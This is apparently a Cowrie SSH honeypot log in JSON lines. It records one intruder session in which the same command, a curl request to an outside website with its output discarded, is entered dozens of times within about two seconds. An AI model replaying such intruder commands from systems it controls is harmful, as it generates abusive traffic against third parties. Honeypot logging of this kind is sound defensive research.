{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:43.066898Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:43.105382Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:43.106363Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:43.144784Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:43.145868Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:43.187354Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:43.188278Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:43.226763Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:43.227631Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:43.270359Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:43.271297Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:43.309448Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:43.310377Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:43.347262Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:43.348213Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:43.387164Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:43.388379Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:43.425469Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:43.426349Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:43.472567Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:43.473485Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:43.512612Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:43.513763Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:43.551175Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:43.552224Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:43.591420Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:43.592404Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:43.629014Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:43.629935Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:43.667157Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:43.668068Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:43.707914Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:43.708926Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:43.746878Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:43.747734Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:43.788548Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:43.789471Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:43.843163Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:43.844812Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:43.893860Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:43.894747Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:43.950198Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:43.951213Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:43.991170Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:43.992278Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:44.035144Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:44.036055Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:44.076829Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:44.077671Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:44.114749Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:44.115816Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:44.155403Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:44.156219Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:44.192965Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:44.193826Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:44.233779Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:44.234766Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:44.278562Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:44.279467Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:44.317259Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:44.318150Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:44.358066Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:44.359012Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:44.396975Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:44.397821Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:44.439658Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:44.440875Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:44.480399Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:44.481240Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:44.558912Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:44.559838Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:44.596441Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:44.597598Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:44.635188Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:44.636203Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:44.673070Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:44.673976Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:44.712677Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:44.713529Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:44.752454Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:44.753971Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:44.792804Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:44.793636Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:44.831101Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:44.831923Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:44.868940Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:44.869767Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:44.906835Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:44.907897Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:44.944663Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:44.945482Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:44.982431Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:44.983261Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:45.019997Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:45.021118Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:45.060458Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:45.061321Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:45.098163Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:45.099102Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:45.135935Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:45.136777Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:45.175003Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:45.175915Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:45.212450Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:45.213331Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:45.250937Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:45.251788Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:45.292676Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:45.293558Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:45.331958Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:45.332872Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:45.373059Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:45.373924Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:45.410611Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:45.411516Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:45.455660Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:45.456896Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:45.493746Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:45.494707Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:45.532178Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:45.533010Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:45.571766Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:45.572831Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:45.610619Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:45.611550Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:45.649872Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:45.651062Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:45.688959Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:45.689842Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
